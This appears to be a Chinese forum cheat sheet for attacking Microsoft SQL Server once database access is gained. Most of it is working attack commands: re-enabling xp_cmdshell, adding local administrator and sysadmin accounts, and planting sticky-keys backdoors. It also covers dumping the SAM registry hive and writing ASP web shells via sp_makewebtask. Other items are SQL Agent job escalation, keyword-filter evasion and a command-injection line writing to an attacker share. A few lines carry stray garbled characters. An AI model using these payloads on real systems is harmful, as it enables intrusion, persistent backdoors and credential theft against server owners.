1. 错误「未能找到存储过程 'master..xp_cmdshell'」。用下面三种方法之一重新注册 xp_cmdshell；若是在注入点执行，语句前加一个空格并以 ; 结尾。本页所有 sp_addextendedproc / sp_dropextendedproc / xp_regwrite / sp_OACreate 操作都要求当前登录具有 sysadmin 权限（防御侧：应用连接不要用 sa 或 sysadmin 登录，SQL Server 服务帐户不要用 LocalSystem，2005 以后保持 xp_cmdshell、Ole Automation Procedures、Ad Hoc Distributed Queries 默认关闭）。
恢复方法：用查询分析器连接后，
第一步执行：EXEC sp_addextendedproc xp_cmdshell, @dllname='xplog70.dll'
第二步执行：sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
（两步只需成功一步：xplog70.dll 是 SQL Server 2000 的文件名，xpsql70.dll 是 SQL Server 7.0 的；第一步成功后不要再执行第二步，否则会报「已存在」。）
然后按 F5 键执行，命令执行完毕。

2. 错误「无法装载 DLL xpsql70.dll 或该 DLL 所引用的某一 DLL。原因 126（找不到指定模块）」。
恢复方法：用查询分析器连接后，
第一步执行：EXEC master.dbo.sp_dropextendedproc 'xp_cmdshell'
第二步执行：EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
（原文第二步写的是 xpsql70.dll，与错误信息矛盾——错误本身就是这个 DLL 装不上；要换成本机实际存在的 DLL，SQL Server 2000 上是 xplog70.dll。）
然后按 F5 键执行，命令执行完毕。

3. 错误「无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127（找不到指定的程序）」。
恢复方法：用查询分析器连接后，
第一步执行：exec sp_dropextendedproc 'xp_cmdshell'
第二步执行：exec sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'
（原文第二步仍写 xpweb70.dll，但错误信息已经说明该库里没有 xp_cmdshell；SQL Server 2000 的 xp_cmdshell 位于 xplog70.dll，xpweb70.dll 里是 sp_makewebtask 一类的 Web 助手过程。）
然后按 F5 键执行，命令执行完毕。
4. 终极方法
如果以上方法均不可恢复，请尝试用下面的办法直接添加帐户（通过 OLE 自动化过程 sp_OACreate / sp_OAMethod 调用 WScript.Shell；SQL Server 2000 上需要 sysadmin，2005 及以后还需先打开 'Ole Automation Procedures'。命令以 SQL Server 服务帐户的身份运行，所以只有该帐户是本地管理员或 LocalSystem 时 net user /add 才会成功）：
用查询分析器连接后，
2000 Server 系统（系统目录为 c:\winnt）：
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'

XP 或 2003 Server 系统（系统目录为 c:\windows）：
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'

五个 SHIFT（粘滞键后门：用 explorer.exe 覆盖 sethc.exe，在登录界面连按五次 Shift 启动的就是一个以 SYSTEM 身份运行的 explorer；第二条同时覆盖 dllcache 里的副本，是为了防止 Windows 文件保护把 sethc.exe 自动还原）：
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';

declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
xp_cmdshell 执行命令的另一种方法（把名字拆成两段拼接后再 exec 变量，用于绕过对关键字 xp_cmdshell 的字符串过滤）：
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'

判断扩展存储过程是否存在（xtype='X' 表示扩展存储过程）：
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为 1 就说明 xp_cmdshell 已经注册。
上传 xplog70.dll 后恢复 xp_cmdshell 的语句（DLL 路径可以是任意 SQL Server 服务帐户能读到的位置）：
sp_addextendedproc xp_cmdshell, @dllname='E:\newche2\about\XPLOG70.DLL'
或者把 xplog70.dll 上传到系统目录后：
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
（原文写成 master.dbo.addextendedproc，少了 sp_ 前缀，照抄执行会报「找不到存储过程」。）
首先开启 Jet 沙盘模式（通过 xp_regwrite 写注册表，需要 sysadmin）：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用 Jet OLE DB 提供程序执行系统命令（需要本机存在一个能打开的 .mdb 文件，这里借用 IAS 自带的 ias.mdb）：
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
若返回「不能找到 c:\windows\system32\ias\ias.mdb」错误，用 exec master..xp_dirtree 'c:\windows\system32\ias',1,1-- 列一下目录（原文路径多写了一层 \ias）：发现 ias.mdb 没了，应该是被管理员删掉了，目录里另一个 mdb 也没了，这时只能另找或上传一个 .mdb 再把路径换掉。
如果 sp_addextendedproc 本身也被删掉了，可用下面的原始定义在 master 中重建它（需要 sysadmin）：
" b) i {2 n( d$ k3 u: o Dcreate procedure sp_addextendedproc --- 1996/08/30 20:13 ' ?( T1 d. r+ i0 t6 a, |
@functname nvarchar(517),/* (owner.)name of function to call */ 5 G4 v' s. _0 x* n9 [) h8 C
@dllname varchar(255)/* name of DLL containing function */ ' H0 R% R# r4 l6 t2 O
as
( n1 X' W. e/ I' dset implicit_transactions off
$ Y& a1 F/ ~8 P) W* [if @@trancount > 0 " ]# {0 T9 D: x# z7 S$ X0 D9 f6 P0 G
begin 0 D, N/ g2 ^" l" m7 c
raiserror(15002,-1,-1,'sp_addextendedproc')
- Z$ ~6 G* ]& rreturn (1)
" z" k; W) P; v( o' Y2 zend 8 W9 X% Z6 ^& K
dbcc addextendedproc( @functname, @dllname) 0 V* p0 Z; I i* Z, I
return (0) -- sp_addextendedproc 7 u+ J4 s- @, V
GO . ~1 e8 ], P0 ]9 j( {
导出管理员密码文件（临时借用内置 Administrator 的口令，用完再把原来的口令散列导回去）
前提：reg export HKLM\SAM 需要 SYSTEM 权限，只有 SQL Server 服务以 LocalSystem 运行时才能从 xp_cmdshell 里导出；原文的「sa 默认可以读 SAM 键，应该」只是猜测，并不总成立。
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg
net user administrator test
用 administrator 登录。
用完机器后导回原来的散列（注意要导入刚才导出的同一个文件，原文写成 c:\test.reg 是笔误）：
reg import c:\old.reg
根本不用克隆帐户。
先要找到对应帐户的 RID 子键：000001F4 即 RID 500，就是内置 Administrator。
恢复所有常用扩展存储过程（第二个参数是各过程所在的 SQL Server 2000 自带 DLL；需 sysadmin 在 master 中执行）：
use master
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll'
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
exec sp_addextendedproc sp_OACreate,'odsole70.dll'
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll'
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
exec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
exec sp_addextendedproc xp_regenumvalues,'xpstar.dll'
exec sp_addextendedproc xp_regread,'xpstar.dll'
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
建立读文件的存储过程（用 BULK INSERT 把文本文件逐行读进临时表；调用者需要 bulkadmin 或 sysadmin，文件以 SQL Server 服务帐户的权限读取）：
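-- sp_readTextFile: reads a text file line by line into a temp table and returns the rows.
--   @filename : path of the file to read (sysname, so at most 128 characters). The file is
--               opened with the SQL Server service account's permissions and the caller
--               needs bulkadmin or sysadmin for BULK INSERT.
-- Each line comes back as varchar(8000); the default row terminator is \r\n.
Create proc sp_readTextFile @filename sysname
as
 begin
    set nocount on
    Create table #tempfile (line varchar(8000))
    -- BULK INSERT does not accept a variable as the file name, so the statement is built
    -- dynamically. quotename(..., '''') doubles any embedded single quote, so a path
    -- containing quote characters cannot break out of the statement the way the original
    -- "..." + @filename + "..." concatenation allowed; single quotes also work regardless
    -- of the QUOTED_IDENTIFIER setting of the dynamic batch.
    exec ('bulk insert #tempfile from ' + quotename(@filename, ''''))
    select * from #tempfile
    drop table #tempfile
 End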
" l. m; A! J/ ?9 G( w
exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp'   -- 利用上面建立的存储过程读文件
查看登录用户（master..sysxlogins 里含口令散列列，按 SQL 2000 的权限设置，一般只有 sysadmin 能看到散列内容）：
Select * from sysxlogins

把文件内容读取到表中（文件名用单引号）：
BULK INSERT tmp from 'c:\test.txt'
delete from 表名   -- 清理表里的内容
create table b_test(fn nvarchar(4000));   -- 建一个表，字段为 fn
加一个 sysadmin 级别的登录（执行者本身需要 sysadmin；原文参数没加引号，照抄会报语法错误）：
exec master.dbo.sp_addlogin 'user','pass';
exec master.dbo.sp_addsrvrolemember 'user','sysadmin'
读文件代码（通过 OLE 自动化的 Scripting.FileSystemObject 逐行读取；把 '文件名' 换成实际路径，opentextfile 的最后一个参数 1 表示只读打开；readline 在读到文件尾时返回非 0，循环随之结束）：
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

写文件代码（createtextfile 的第二个参数 1 表示覆盖已有文件，例子里直接覆盖的是 Serv-U 的配置文件；《内容》换成要写入的一行文本）：
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
添加 lake2 的扩展存储过程 shell（把自定义 DLL 注册成扩展存储过程来执行命令；原文把 drop 写在 exec 前面，按那个顺序执行会报过程不存在，应当用完后再 drop）：
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
EXEC xp_lake2 'net user'
sp_dropextendedproc xp_lake2
得到硬盘文件信息
-- 参数说明：目录名，目录深度，是否显示文件（第三个参数为 1 时同时列出文件，否则只列目录）
execute master..xp_dirtree 'c:'
execute master..xp_dirtree 'c:',1
execute master..xp_dirtree 'c:',1,1
读 Serv-U 配置信息（ServUDaemon.ini 保存 Serv-U 的用户和本地管理设置）：
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'

通过 xp_regwrite 写 SHIFT 后门（利用 Image File Execution Options 的 Debugger 项：登录界面连按五次 Shift 时系统启动的就是 cmd.exe 而不是 sethc.exe。Debugger 的值必须是可执行文件路径，原文值末尾多出的 " on" 会让系统找不到程序）：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_SZ','c:\windows\system32\cmd.exe';--
找到 web 路径，然后用 exec master.dbo.xp_subdirs 'd:\web\www.xx.com'; 列出子目录确认。
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '   -- 用 Web 助手过程直接写出一个小马就可以了
（sp_makewebtask 在 SQL Server 2000 上默认可用；2005 上要先 sp_configure 'Web Assistant Procedures',1，再往后的版本已经移除。输出文件以 SQL Server 服务帐户的权限写入。）

EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp', @query = 'SELECT 你的字段 FROM 你建的临时表'
SQL Server 2005 下开启 xp_cmdshell 的办法（2005 起默认关闭；修改这些选项需要 sysadmin 或 ALTER SETTINGS 权限）：
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

SQL 2005 开启 OPENROWSET / OPENDATASOURCE 即席查询支持的方法：
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;

SQL 2005 开启 sp_OACreate 等 OLE 自动化过程的方法：
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
以下几项还没完全验证，暂且留下研究：
4) 利用 SQL Agent 作业执行命令
use msdb; -- 这儿不要是 master 哟，作业存储过程在 msdb 里
exec sp_add_job @job_name='czy82';
exec sp_add_jobstep @job_name='czy82', @step_name='Exec my sql', @subsystem='CMDEXEC', @command='dir c:\>c:\b.txt';
exec sp_add_jobserver @job_name='czy82', @server_name='smscomputer';
exec sp_start_job @job_name='czy82';
（原文的字符串参数被论坛吞掉了引号，上面已补回。）
利用 MSSQL 的作业处理也是可以执行命令的，而且如果上面的 @subsystem 改成 TSQL，后面的 @command 就可以执行 T-SQL 语句了。
使用这几个存储过程有两点要注意：第一，@server_name 要指定你的 SQL 服务器名（本机可写 @server_name='(local)'）；
第二，系统的 SQLSERVERAGENT 服务必须已启动（默认没启动，气人吧），作业步骤是以 SQL Agent 服务帐户的身份运行的：
net start SQLSERVERAGENT
对于作业这个东西还有一个地方不同，就是 public 也可以执行……这里利用的是一个系统漏洞（早期 SQL Server 2000 里 msdb 的作业存储过程对 public 开放；已打补丁的 2000 上可能已不可用，2005 以后需要 msdb 中的 SQLAgentUserRole 等角色，public 不能再建作业），看下面的：
USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
@enabled = 1,
@description = 'This will give a low privileged user access to xp_cmdshell',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
@step_name = 'Exec my sql',
@subsystem = 'TSQL',
@command = 'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
@server_name = '你的SQL的服务器名'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'
（原文的引号同样被论坛吞掉，上面按 xp_execresultset(查询, 数据库) 的用法补回：它把查询结果的每一行当作 T-SQL 再执行一遍，所以内层 select 返回的那个字符串就是最终被执行的 xp_cmdshell 调用。）

不要怀疑上面的代码，我是测试成功了的！这儿要注意 xp_execresultset，就是因为它才让我们可以以 public 执行 xp_cmdshell——实际上命令是作业步骤以 SQL Agent 服务帐户（通常具有 sysadmin）的身份执行的，而不是以 public 自己的权限。
5) 关于 Microsoft SQL Agent Jobs 任意文件可删除/覆盖漏洞（public 用户也可以）
安焦有文章：http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
（原理：作业步骤的 @output_file_name 由 SQL Agent 服务帐户写入，指向哪个路径就覆盖哪个文件。）

USE msdb
EXEC sp_add_job @job_name = 'ArbitraryFilecreate',
@enabled = 1,
@description = 'This will create a file called c:\sqlafc123.txt',
@delete_level = 1
EXEC sp_add_jobstep @job_name = 'ArbitraryFilecreate',
@step_name = 'SQLAFC',
@subsystem = 'TSQL',
@command = 'select ''hello, this file was created by the SQL Agent.''',
@output_file_name = 'c:\sqlafc123.txt'
EXEC sp_add_jobserver @job_name = 'ArbitraryFilecreate',
@server_name = 'SERVER_NAME'
EXEC sp_start_job @job_name = 'ArbitraryFilecreate'
（字符串参数的引号已补回；@command 里的字符串常量要用两个单引号转义。）

如果 subsystem 选的是 TSQL，在生成的文件的头部会有类似下面的内容（原文这段是乱码，这里按 SQL Agent 的输出格式还原；中文版 SQL Server 的提示文字会不同）：

Job 'ArbitraryFilecreate' : Step 1, 'SQLAFC' : Began Executing 2003-02-07 18:24:19
----------------------------------------------
hello, this file was created by the SQL Agent.

(1 row(s) affected)

所以我建议要生成文件最好 subsystem 选 CMDEXEC，如果利用得好我们可以写一个带添加管理员命令的 vbs 文件到启动目录！
6) 关于 sp_makewebtask（可以写任意内容、任意文件名的文件）
关于 sp_MScopyscriptfile 看下面的例子（从 payload 看，它把文件名拼进一条带引号的 shell 命令里，所以文件名中的双引号和管道符会被当作命令执行；论坛吞掉了引号和字符串连接符，下面按语义补回）：
declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command = 'dir c:\ > "\\attackerip\share\dir.txt"'
select @scripfile = 'c:\autoexec.bat > nul" | ' + @command + ' | rd "'
exec sp_MScopyscriptfile @scripfile, ''
（原文 exec 的第二个参数被吞掉；按其签名应为目标路径，传空串即可——未验证。）
这两个都还在测试中。

让 MSSQL 的 public 用户得到一个本机的 web shell（前提是 sp_makewebtask 允许 public 执行，且输出路径位于 web 目录下并可由 SQL Server 服务帐户写入）：
sp_makewebtask @outputfile='d:\sms\a.asp', @charset='gb2312',
--@query='select ''<img src=vbscript:msgbox(now())>'''
--@query='select ''<%response.write request.servervariables("APPL_PHYSICAL_PATH")%>'''
@query='select ''
<%On Error Resume Next
Set oscript = Server.createObject("wscript.SHELL")
Set oscriptNet = Server.createObject("wscript.NETWORK")
Set oFileSys = Server.createObject("scripting.FileSystemObject")
szCMD = Request.Form(".CMD")
If (szCMD <>"")Then
szTempFile = "C:\" & oFileSys.GetTempName()
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0)
End If %>
<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
</FORM><PRE>
<% If (IsObject(oFile))Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.deleteFile(szTempFile, True)
End If%>
</BODY></HTML>
'''
（整段 ASP 作为 @query 里 select 的字符串常量传入，字符串参数的引号已补回；原文 method=" OST" 和 < RE> 各被吞掉了一个 P，应为 POST 和 <PRE>。这段 ASP 只用了双引号，所以不需要再做单引号转义。）